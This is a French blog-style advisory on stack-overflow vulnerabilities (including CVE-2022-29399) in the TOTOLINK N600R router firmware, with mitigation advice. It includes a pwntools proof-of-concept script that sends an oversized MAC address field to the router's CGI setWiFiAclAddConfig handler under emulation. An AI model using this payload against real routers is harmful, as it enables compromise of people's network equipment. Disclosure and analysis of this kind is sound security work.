Routeur Wifi N600R dangeureux !!!

totolink routeur wifi n600R

TOTOLINK est de nouveau à l’affiche sur le site. On peut reconnaître une chose à ce constructeur, quand ils font un produit ils savent vraiment mettre le paquet sur les failles de cybersécurité !!!

LE N600R est donc un routeur wifi avec comme principale caractéristiques d avoir … 9 failles critiques CVE !!!!

 
La version du firmware cible du TOTOLINK N600R est : V4.3.0cu.7647_B20210106
 
Toutes ces failles sont de types stack overflow.
Plus d ‘info sur  :
 
 

Exemple de script d'attaque sur TOTOLINK N600R

				
					from pwn import *
import json

data = {
    "topicurl": "setting/setWiFiAclAddConfig",
    "wifiIdx": "0",
    "addEffect": "0",
    "comment": "AAA",
    "macAddress": "A"*0x200 + ":" + "A"*0x100 + ":A:A"
}
data = json.dumps(data)
print(data)

argv = [
    "qemu-mips-static",
    "-L", "./lib",
    "-E", "LD_PRELOAD=./hook.so",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecginew.cgi"
]

a = process(argv=argv)

a.sendline(data.encode())

a.interactive()
				
			

Comment protéger votre N600R

Comme toujours la première façon de se prémunir est d’éviter que ce type d’équipement ne soit accessible depuis le net.

Ensuite faite vos mise à jour pour passer sur la dernière version :

http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=2&ids=36

Information Valeur

CVE

CVE-2022-29399

CVE publié le

10/05/2022

Score

10

Fuite de données

Critique

Intégrité Système

Critique

Impact sur les ressources

Critique

Compléxité

Facile

Authentification requise

Non